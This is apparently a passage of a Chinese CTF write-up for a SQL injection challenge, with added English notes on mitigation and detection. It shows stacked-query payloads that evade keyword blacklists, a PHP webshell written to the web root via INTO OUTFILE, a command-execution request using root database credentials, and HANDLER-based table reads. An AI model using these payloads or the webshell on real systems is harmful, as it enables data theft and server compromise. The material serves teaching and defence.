-- Stacked-query payload: `1';` ends the quoted value at the injection point and
-- the statements after it run as separate statements in the same call. This only
-- works when the client API allows multi-statement execution; bound parameters
-- and single-statement mode remove the vector entirely.
1';
-- char(115,101,108,101,99,116) spells "select" byte by byte so a keyword
-- blacklist never sees the word. Blacklists are not a control: the keyword can
-- always be assembled at runtime, as here.
SET @sql=concat(char(115,101,108,101,99,116)," * from `1919810931114514`");
-- PREPARE/EXECUTE of a user variable is unusual for an application account and
-- is a high-signal event to log and alert on (general log / audit plugin).
PREPARE sqla from @sql;
EXECUTE sqla;
-- Trailing `#` comments out whatever the surrounding query adds after the
-- injection point.
#
或者不用char()方法,直接将字符串相加也可以绕过限制:
-- Same stacked-query technique as above; `-1'` closes the quoted value.
-1';
-- Splitting the keyword into 'se' and 'lect' defeats a blacklist without
-- char(): the filter matches on the source text, the server on the
-- concatenated result. Only parameterized queries close this class of bypass.
SET @sql = CONCAT('se','lect * from `1919810931114514`;');
PREPARE sqla from @sql;
EXECUTE sqla;
#
3.RCE
报错注入后可以看见用户为root,直接上马拿权限。
先上马:
-- Webshell drop via SELECT ... INTO OUTFILE. Every precondition is
-- defender-controlled: the DB account holds the FILE privilege (the writeup
-- says the account is root), secure_file_priv permits writing under the web
-- root, and the mysqld OS user can write there. A least-privilege application
-- account, secure_file_priv pointed at a non-web directory, and a web root not
-- writable by the DB process each block this on their own.
1';
-- "s","elect" and char(46) for "." are blacklist evasion again; the statement is
-- still a plain INTO OUTFILE and shows up as such in query logs.
Set @sql=concat("s","elect '<?php @print_r(`$_GET[oatmeal]`);?>' into outfile '/var/www/html/1",char(46),"php'");
PREPARE sqla from @sql;
EXECUTE sqla;
-- Detection: a new .php file in the web root owned by the mysql OS user, or any
-- INTO OUTFILE issued over a web-facing connection, is a strong compromise
-- indicator.
#
RCE:
/1.php?oatmeal=mysql -uroot -proot -e"use supersqli;select flag from \`1919810931114514\`;"
读flag。
4.handler
handler代替select进行查询。
-- HANDLER is MySQL's direct storage-engine read interface; it fetches rows
-- without the SELECT keyword, so keyword blacklists miss it. It is not a
-- privilege bypass -- presumably table-level read privilege still applies
-- (confirm for the server version in use). The root enabler is again stacked
-- queries, not HANDLER itself.
1';
handler `1919810931114514` open as oatmeal;
handler oatmeal read first;
-- HANDLER statements from an application connection are rare enough to alert
-- on outright.
handler oatmeal close;#